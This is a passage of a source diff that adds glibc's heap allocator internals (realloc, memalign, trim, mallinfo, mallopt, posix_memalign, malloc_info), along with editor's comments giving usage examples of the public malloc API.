+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
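+
+  /* [Editor's note: worked example, not part of upstream glibc.]
+     The rounding below relies on alignment being a power of two, so
+     -alignment == ~(alignment - 1).  For instance, with alignment = 0x40
+     and m = 0x5555555550d8:
+
+       (m + 0x40 - 1) & -0x40  ==  0x555555555117 & ~0x3f
+                               ==  0x555555555100
+
+     i.e. m is rounded up to the next 0x40-aligned address.  */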
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
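+
+/* [Editor's note: usage sketch, not part of upstream glibc.]
+   After releasing a large amount of heap memory, an application can ask
+   the allocator to hand free pages back to the kernel:
+
+     #include <malloc.h>
+
+     free (big_buffer);
+     if (malloc_trim (0))
+       puts ("some memory was returned to the system");
+
+   The pad argument keeps that many bytes of slack at the top of the
+   main arena instead of trimming them.  */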
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
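+
+/* [Editor's note: usage sketch, not part of upstream glibc.]
+   malloc_usable_size() reports how many bytes are actually available in
+   the chunk backing an allocation, which can exceed the requested size
+   because of alignment and minimum-size rounding.  On a typical 64-bit
+   build:
+
+     char *p = malloc (20);
+     size_t n = malloc_usable_size (p);   // commonly 24 here
+
+   The extra bytes may be written, but portable code should not depend
+   on the exact value.  */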
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
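+
+/* [Editor's note: usage sketch, not part of upstream glibc.]
+   The statistics accumulated above can be inspected from application
+   code, for example:
+
+     #include <malloc.h>
+
+     struct mallinfo mi = mallinfo ();
+     printf ("arena: %d, in use: %d, free: %d\n",
+             mi.arena, mi.uordblks, mi.fordblks);
+
+   Note that the struct fields are plain ints, so the reported values
+   can wrap on programs using more than 2 GiB of heap.  */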
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
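+
+/* [Editor's note: usage sketch, not part of upstream glibc.]
+   mallopt() is the public entry point for the do_set_* helpers above.
+   For example, disabling fastbins entirely (handy when studying the
+   other bins) or raising the mmap threshold:
+
+     #include <malloc.h>
+
+     mallopt (M_MXFAST, 0);                // freed small chunks skip fastbins
+     mallopt (M_MMAP_THRESHOLD, 1 << 20);  // serve requests >= 1 MiB via mmap
+
+   Each call returns 1 on success and 0 if the value was rejected.  */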
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
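+
+/* [Editor's note: usage sketch, not part of upstream glibc.]
+   Unlike memalign(), posix_memalign() reports problems through its
+   return value and requires the alignment to be a power-of-two
+   multiple of sizeof (void *):
+
+     void *p;
+     int rc = posix_memalign (&p, 64, 1024);
+     if (rc != 0)
+       fprintf (stderr, "posix_memalign: %s\n", strerror (rc));
+
+   On success p is 64-byte aligned and is released with free().  */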
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
